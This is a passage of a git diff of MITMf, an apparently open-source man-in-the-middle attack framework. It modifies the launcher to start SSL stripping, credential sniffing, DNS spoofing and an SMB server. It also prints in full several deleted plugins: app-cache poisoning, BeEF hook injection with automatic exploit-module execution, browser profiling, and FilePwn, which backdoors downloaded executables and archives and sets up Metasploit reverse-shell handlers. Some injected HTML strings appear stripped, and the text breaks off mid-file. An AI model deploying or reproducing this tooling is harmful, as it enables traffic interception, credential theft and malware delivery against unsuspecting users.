initializing plugins".format(mitmf_version) load = [] for p in plugins: + #load only the plugins that have been called at the command line if vars(args)[p.optname] is True: print "|_ {} v{}".format(p.name, p.version) @@ -125,48 +126,56 @@ for p in plugins: p.tree_output.remove(line) p.initialize(args) - load.append(p) if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ {}".format(line) -#Plugins are ready to go, start MITMf -if args.disproxy: - ProxyPlugins.getInstance().setPlugins(load) - DNSChef.getInstance().start() -else: - from core.sslstrip.StrippingProxy import StrippingProxy - from core.sslstrip.URLMonitor import URLMonitor - from core.dnschef.dnschef import DNSChef + load.append(p) - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) +#Plugins are ready to go, let's rock & roll +from core.sslstrip.StrippingProxy import StrippingProxy +from core.sslstrip.URLMonitor import URLMonitor + +URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + +CookieCleaner.getInstance().setEnabled(args.killsessions) +ProxyPlugins.getInstance().setPlugins(load) + +strippingFactory = http.HTTPFactory(timeout=10) +strippingFactory.protocol = StrippingProxy + +reactor.listenTCP(args.listen, strippingFactory) + +for p in load: - DNSChef.getInstance().start() + p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + p.startConfigWatch() - CookieCleaner.getInstance().setEnabled(args.killsessions) - ProxyPlugins.getInstance().setPlugins(load) + t = threading.Thread(name='{}-thread'.format(p.name), target=p.startThread, args=(args,)) + t.setDaemon(True) + t.start() - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy +print "|" +print "|_ Sergio-Proxy v{} online".format(sergio_version) +print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) - reactor.listenTCP(args.listen, strippingFactory) +#Start Net-Creds +from core.netcreds.NetCreds import NetCreds +NetCreds().start(args.interface, myip) +print "|_ Net-Creds v{} online".format(netcreds_version) - #load custom reactor options for plugins that have the 'plugin_reactor' attribute - for p in load: - if hasattr(p, 'plugin_reactor'): - p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it +#Start all servers! +from core.dnschef.DNSchef import DNSChef +DNSChef.getInstance().start() +print "|_ DNSChef v{} online\n".format(dnschef_version) - if hasattr(p, 'startConfigWatch'): - p.startConfigWatch() - - print "|" - print "|_ Sergio-Proxy v{} online".format(sergio_version) - print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) - print "|_ DNSChef v{} online\n".format(dnschef_version) +from core.protocols.smb.SMBserver import SMBserver +SMBserver().start() +#start the reactor reactor.run() #run each plugins finish() on exit for p in load: - p.finish() \ No newline at end of file + p.finish() diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py deleted file mode 100644 index 8d81dc8..0000000 --- a/plugins/AppCachePoison.py +++ /dev/null @@ -1,207 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. 
-# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz - -import logging -import re -import os.path -import time -import sys - -from plugins.plugin import Plugin -from datetime import date -from core.sslstrip.URLMonitor import URLMonitor -from core.configwatcher import ConfigWatcher - -mitmf_logger = logging.getLogger('mitmf') - -class AppCachePlugin(Plugin): - name = "App Cache Poison" - optname = "appoison" - desc = "Performs App Cache Poisoning attacks" - implements = ["handleResponse"] - version = "0.3" - has_opts = False - - def initialize(self, options): - self.options = options - self.mass_poisoned_browsers = [] - self.urlMonitor = URLMonitor.getInstance() - - self.urlMonitor.setAppCachePoisoning() - - def handleResponse(self, request, data): - - self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request - url = request.client.uri - req_headers = request.client.getAllHeaders() - headers = request.client.responseHeaders - ip = request.client.getClientIP() - - ######################################################################### - - if "enable_only_in_useragents" in self.config: - regexp = self.config["enable_only_in_useragents"] - if regexp and not re.search(regexp,req_headers["user-agent"]): - mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"])) - return {'request': request, 'data': data} - - urls = self.urlMonitor.getRedirectionSet(url) - mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) - (name,s,element,url) = self.getSectionForUrls(urls) - - if s is False: - data = self.tryMassPoison(url, data, headers, req_headers, ip) - return {'request': request, 'data': data} - - mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) - p = self.getTemplatePrefix(s) - - if element == 'tamper': - mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) - if os.path.exists(p + '.replace'): # replace whole content - f = open(p + '.replace','r') - data = self.decorate(f.read(), s) - f.close() - - elif os.path.exists(p + '.append'): # append file to body - f = open(p + '.append','r') - appendix = self.decorate(f.read(), s) - f.close() - # append to body - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) - - # add manifest reference - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) - self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip - return data - - def getMassPoisonHtml(self): - html = "
" - for i in self.config: - if isinstance(self.config[i], dict): - if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False): - html += "" - - return html + "
" - - def cacheForFuture(self, headers): - ten_years = 315569260 - headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)]) - headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh - in_ten_years = date.fromtimestamp(time.time() + ten_years) - headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")]) - - def removeDangerousHeaders(self, headers): - headers.removeHeader("X-Frame-Options") - - def getSpoofedManifest(self, url, section): - p = self.getTemplatePrefix(section) - if not os.path.exists(p+'.manifest'): - p = self.getDefaultTemplatePrefix() - - f = open(p + '.manifest', 'r') - manifest = f.read() - f.close() - return self.decorate(manifest, section) - - def decorate(self, content, section): - for i in section: - content = content.replace("%%"+i+"%%", section[i]) - return content - - def getTemplatePrefix(self, section): - if section.has_key('templates'): - return self.config['templates_path'] + '/' + section['templates'] - - return self.getDefaultTemplatePrefix() - - def getDefaultTemplatePrefix(self): - return self.config['templates_path'] + '/default' - - def getManifestUrl(self, section): - return section.get("manifest_url",'/robots.txt') - - def getSectionForUrls(self, urls): - for url in urls: - for i in self.config: - if isinstance(self.config[i], dict): #section - section = self.config[i] - name = i - - if section.get('tamper_url',False) == url: - return (name, section, 'tamper',url) - - if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): - return (name, section, 'tamper',url) - - if section.get('manifest_url',False) == url: - return (name, section, 'manifest',url) - - if section.get('raw_url',False) == url: - return (name, section, 'raw',url) - - return (None, False,'',urls.copy().pop()) - - diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py deleted file mode 100644 index 39bed82..0000000 --- a/plugins/BeefAutorun.py +++ /dev/null @@ -1,131 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import logging -import sys -import json -import threading - -from core.beefapi.beefapi import BeefAPI -from core.configwatcher import ConfigWatcher -from core.utils import SystemConfig -from plugins.plugin import Plugin -from plugins.Inject import Inject -from time import sleep - -mitmf_logger = logging.getLogger('mitmf') - -class BeefAutorun(Inject, Plugin, ConfigWatcher): - name = "BeEFAutorun" - optname = "beefauto" - desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" - tree_output = [] - depends = ["Inject"] - version = "0.3" - has_opts = False - - def initialize(self, options): - self.options = options - self.ip_address = SystemConfig.getIP(options.interface) - - Inject.initialize(self, options) - - self.onConfigChange() - - t = threading.Thread(name="autorun", target=self.autorun, args=()) - t.setDaemon(True) - t.start() - - def onConfigChange(self): - - beefconfig = self.config['MITMf']['BeEF'] - - self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) - - self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - - self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) - - def autorun(self): - already_ran = [] - already_hooked = [] - - while True: - mode = self.config['BeEFAutorun']['mode'] - sessions = self.beef.sessions_online() - if (sessions is not None and len(sessions) > 0): - for session in sessions: - - if session not in already_hooked: - info = self.beef.hook_info(session) - mitmf_logger.info("{} >> joined the horde! 
[id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) - already_hooked.append(session) - self.black_ips.append(str(info['ip'])) - - if mode == 'oneshot': - if session not in already_ran: - self.execModules(session) - already_ran.append(session) - - elif mode == 'loop': - self.execModules(session) - sleep(10) - - else: - sleep(1) - - def execModules(self, session): - session_info = self.beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] - all_modules = self.config['BeEFAutorun']["ALL"] - targeted_modules = self.config['BeEFAutorun']["targets"] - - if len(all_modules) > 0: - mitmf_logger.info("{} >> sending generic modules".format(session_ip)) - for module, options in all_modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) - - mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) - for os in targeted_modules: - if (os in hook_os) or (os == hook_os): - browsers = targeted_modules[os] - if len(browsers) > 0: - for browser in browsers: - if browser == hook_browser: - modules = targeted_modules[os][browser] - if len(modules) > 0: - for module, options in modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py deleted file mode 100644 index 44ea3c5..0000000 --- a/plugins/BrowserProfiler.py +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -from pprint import pformat -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class BrowserProfiler(Inject, Plugin): - name = "Browser Profiler" - optname = "browserprofiler" - desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() - self.dic_output = {} # so other plugins can access the results - - def post2dict(self, post): #converts the ajax post to a dic - dict = {} - for line in post.split('&'): - t = line.split('=') - dict[t[0]] = t[1] - return dict - - def sendPostData(self, request): - #Handle the plugin output - if 'clientprfl' in request.uri: - self.dic_output = self.post2dict(request.postData) - self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client - if self.dic_output['plugin_list'] > 0: - self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') - pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) - - def get_payload(self): - payload = """""" - - return payload diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index b912244..c039f61 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -20,7 +20,6 @@ from plugins.plugin import Plugin - class CacheKill(Plugin): name = "CacheKill" optname = "cachekill" diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py deleted file mode 100644 index ebe6fbc..0000000 --- a/plugins/FilePwn.py +++ /dev/null @@ -1,652 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' -# -# Author Joshua Pitts the.midnite.runr 'at' gmail com -# -# Copyright (c) 2013-2014, Joshua Pitts -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without modification, -# are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# 3. 
Neither the name of the copyright holder nor the names of its contributors -# may be used to endorse or promote products derived from this software without -# specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -# -# Tested on Kali-Linux. - -import sys -import os -import pefile -import zipfile -import logging -import shutil -import random -import string -import tarfile -import multiprocessing -import threading - -from libs.bdfactory import pebin -from libs.bdfactory import elfbin -from libs.bdfactory import machobin -from core.msfrpc import Msfrpc -from core.configwatcher import ConfigWatcher -from plugins.plugin import Plugin -from tempfile import mkstemp -from configobj import ConfigObj - -mitmf_logger = logging.getLogger('mitmf') - -class FilePwn(Plugin, ConfigWatcher): - name = "FilePwn" - optname = "filepwn" - desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - - self.patched = multiprocessing.Queue() - - #FOR FUTURE USE - self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] - - #FOR FUTURE USE - self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] - - #USED NOW - self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, - 'pe': {'number': 'MZ', 'offset': 0}, - 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, - 'bz': {'number': 'BZ', 'offset': 0}, - 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, - 'tar': {'number': 'ustar', 'offset': 257}, - 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, - 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, - 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, - } - - #NOT USED NOW - #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - - #FilePwn options - self.userConfig = self.config['FilePwn'] - self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] - self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] - self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] - self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] - self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] - self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] - self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] - self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] - self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] - self.FatPriority = 
self.userConfig['targets']['ALL']['FatPriority'] - self.zipblacklist = self.userConfig['ZIP']['blacklist'] - self.tarblacklist = self.userConfig['TAR']['blacklist'] - - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] - - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - self.tree_output.append("Setting up Metasploit payload handlers") - jobs = msf.call('job.list') - for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: - cmd = "use exploit/multi/handler\n" - cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) - cmd += "set LHOST {}\n".format(config["HOST"]) - cmd += "set LPORT {}\n".format(config["PORT"]) - cmd += "exploit -j\n" - - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - - def onConfigChange(self): - self.initialize(self.options) - - def convert_to_Bool(self, aString): - if aString.lower() == 'true': - return True - elif aString.lower() == 'false': - return False - elif aString.lower() == 'none': - return None - - def bytes_have_format(self, bytess, formatt): - number = self.magicNumbers[formatt] - if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: - return True - return False - - def binaryGrinder(self, binaryFile): - """ - Feed potential binaries into this function, - it will return the result PatchedBinary, False, or None - """ - - with open(binaryFile, 'r+b') as f: - binaryTMPHandle = f.read() - - binaryHeader = binaryTMPHandle[:4] - result = None - - try: - if binaryHeader[:2] == 'MZ': # PE/COFF - pe = pefile.PE(data=binaryTMPHandle, fast_load=True) - magic = pe.OPTIONAL_HEADER.Magic - machineType = pe.FILE_HEADER.Machine - - #update when supporting more than one arch - if (magic == int('20B', 16) and machineType == 0x8664 and - self.WindowsType.lower() in ['all', 'x64']): - add_section = False - cave_jumping = False - if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx64['SHELL'], - HOST=self.WindowsIntelx64['HOST'], - PORT=int(self.WindowsIntelx64['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], - 
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif (machineType == 0x14c and - self.WindowsType.lower() in ['all', 'x86']): - add_section = False - cave_jumping = False - #add_section wins for cave_jumping - #default is single for BDF - if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx86['SHELL'], - HOST=self.WindowsIntelx86['HOST'], - PORT=int(self.WindowsIntelx86['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF - - targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - if targetFile.class_type == 0x1: - #x86CPU Type - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx86['SHELL'], - HOST=self.LinuxIntelx86['HOST'], - PORT=int(self.LinuxIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - elif targetFile.class_type == 0x2: - #x64 - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx64['SHELL'], - HOST=self.LinuxIntelx64['HOST'], - PORT=int(self.LinuxIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho - targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE - - if targetFile.FAT_FILE is True: - if self.FatPriority == 'x86': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif self.FatPriority == 'x64': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif 
targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - self.patched.put(result) - return - - except Exception as e: - print 'Exception', str(e) - mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) - return None - - def tar_files(self, aTarFileBytes, formatt): - "When called will unpack and edit a Tar File and return a tar file" - - print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' - - if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): - print "[!] TarFile over allowed size" - mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) - self.patched.put(aTarFileBytes) - return - - with tempfile.NamedTemporaryFile() as tarFileStorage: - tarFileStorage.write(aTarFileBytes) - tarFileStorage.flush() - - if not tarfile.is_tarfile(tarFileStorage.name): - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - compressionMode = ':' - if formatt == 'gz': - compressionMode = ':gz' - if formatt == 'bz': - compressionMode = ':bz2' - - tarFile = None - try: - tarFileStorage.seek(0) - tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) - except tarfile.ReadError: - pass - - if tarFile is None: - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - print '[*] Tar file contents and info:' - print '[*] Compression:', formatt - - members = tarFile.getmembers() - for info in members: - print "\t", info.name, info.mtime, info.size - - newTarFileStorage = tempfile.NamedTemporaryFile() - newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) - - patchCount = 0 - wasPatched = False - - for info in members: - print "[*] >>> Next file in tarfile:", info.name - - if not info.isfile(): - print info.name, 'is not a file' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - if info.size >= long(self.FileSizeMax): - print info.name, 'is too big' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - # Check against keywords - keywordCheck = False - - if type(self.tarblacklist) is str: - if self.tarblacklist.lower() in info.name.lower(): - keywordCheck = True - - else: - for keyword in self.tarblacklist: - if keyword.lower() in info.name.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Tar blacklist enforced!" - mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) - continue - - # Try to patch - extractedFile = tarFile.extractfile(info) - - if patchCount >= int(self.userConfig['TAR']['patchCount']): - newTarFile.addfile(info, extractedFile) - else: - # create the file on disk temporarily for fileGrinder to run on it - with tempfile.NamedTemporaryFile() as tmp: - shutil.copyfileobj(extractedFile, tmp) - tmp.flush() - patchResult = self.binaryGrinder(tmp.name) - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(tmp.name) - print "[*] Patching complete, adding to tar file." - info.size = os.stat(file2).st_size - with open(file2, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) - os.remove(file2) - wasPatched = True - else: - print "[!] 
Patching failed" - with open(tmp.name, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) - if patchCount == int(self.userConfig['TAR']['patchCount']): - mitmf_logger.info("Met Tar config patchCount limit.") - - # finalize the writing of the tar file first - newTarFile.close() - - # then read the new tar file into memory - newTarFileStorage.seek(0) - ret = newTarFileStorage.read() - newTarFileStorage.close() # it's automatically deleted - - if wasPatched is False: - # If nothing was changed return the original - print "[*] No files were patched forwarding original file" - self.patched.put(aTarFileBytes) - return - else: - self.patched.put(ret) - return - - def zip_files(self, aZipFile): - "When called will unpack and edit a Zip File and return a zip file" - - print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' - - if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): - print "[!] ZipFile over allowed size" - mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) - self.patched.put(aZipFile) - return - - tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) - tmpDir = '/tmp/' + tmpRan - tmpFile = '/tmp/' + tmpRan + '.zip' - - os.mkdir(tmpDir) - - with open(tmpFile, 'w') as f: - f.write(aZipFile) - - zippyfile = zipfile.ZipFile(tmpFile, 'r') - - #encryption test - try: - zippyfile.testzip() - - except RuntimeError as e: - if 